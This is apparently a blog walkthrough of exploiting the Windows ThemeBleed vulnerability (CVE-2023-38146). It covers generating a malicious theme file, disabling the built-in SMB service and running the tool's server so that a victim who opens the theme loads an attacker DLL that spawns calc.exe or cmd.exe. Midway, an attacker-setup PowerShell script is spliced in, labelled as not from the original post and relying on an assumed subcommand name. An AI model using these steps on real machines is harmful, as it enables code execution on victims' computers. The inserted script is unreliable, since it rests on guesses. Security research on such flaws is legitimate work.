ThemeBleed exploit
init
Let's try to exploit yet another Windows vulnerability, CVE-2023-38146, also known as ThemeBleed. To do that we need to create a theme file that contains the path from which the payload will be delivered.
Please note that, as per my testing, the command execution only happens if both the SMB server and the theme file are on the same machine. Pulling DLL(s) from a remote system appears not to work.
On the attacker machine, you will need to disable the built-in SMB server by disabling the Server service (service name LanmanServer) in services.msc, and keep it disabled. While it runs it holds TCP port 445, which the ThemeBleed server needs to bind.
Download the repo and use the command below to generate the theme file:
.\ThemeBleed.exe make_theme localhost exp.theme
After generating it, run the tool in server mode.
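The attacker-side setup above, collected into one script with the checks I would run before handing the theme to the victim. This is an added example, not code from the original post or from the ThemeBleed repo; it assumes ThemeBleed.exe is in the current directory, that the theme should point at localhost as in the walkthrough, and that the repo's server mode is invoked as `ThemeBleed.exe server`.

```powershell
# Added example (not part of the original post or the ThemeBleed repo).
# Run from an elevated PowerShell on the attacker host.

# 1. The built-in SMB server ("Server" in services.msc, service name LanmanServer)
#    owns TCP/445. The ThemeBleed server needs that port, so stop and disable it.
#    -Force also stops services that depend on it (e.g. Computer Browser).
Stop-Service -Name LanmanServer -Force
Set-Service  -Name LanmanServer -StartupType Disabled

# 2. Confirm the service is really stopped and nothing else is listening on 445,
#    otherwise the tool's server will fail to bind or the victim will talk to the wrong server.
$svc = Get-Service -Name LanmanServer
if ($svc.Status -ne 'Stopped') { throw "LanmanServer is still $($svc.Status)" }
$listener = Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue
if ($listener) { throw "TCP/445 is still bound by PID $($listener.OwningProcess)" }

# 3. Generate the theme (same command as in the post) and show where it points,
#    so you can see the UNC path the victim will resolve before you ship the file.
.\ThemeBleed.exe make_theme localhost exp.theme
Select-String -Path .\exp.theme -Pattern 'localhost'

# 4. Start the tool's server mode (assumed subcommand name from the repo README);
#    it answers the victim's SMB requests for the theme resources. Leave it running
#    while the theme is opened on the victim.
.\ThemeBleed.exe server
```

If step 2 throws, check for third-party SMB servers or a VPN/virtualization adapter that still exposes 445 before retrying; the victim must reach the ThemeBleed server, not the Windows one.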
Now copy the exp.theme file to the victim machine (Windows 11) and open it to run the exploit.
As we can see, calc.exe has been executed.
privilege ?
Windows' permission system is a mystical cloud conjured by Aladdin's genie, so a calc.exe window on its own tells us nothing about the privileges it got; the integrity level (Mandatory Label) of the spawned process, visible in Process Explorer or via whoami /groups from a spawned shell, is what actually matters. Let's try something else. From Process Explorer we can see the following information.
As this is no fun, we will try to execute our own command, cmd.exe, by modifying the DLL file that the exploit delivers when it runs.
Now I have created my own DLL and, instead of running calc.exe, I tried to run cmd.exe. After a couple of tries I was able to run calc.exe and a message box showing a prompt. In the screenshot below you will also be able to see the permission level the cmd.exe process is running at.
future work
Currently I am not able to deliver the payload from a remote system, and I plan to check why my DLL works when running from localhost but not when it runs from a remote system. The author's original DLL, however, works both from localhost and from remote systems.
reference
https://github.com/gabe-k/themebleed
https://exploits.forsale/themebleed/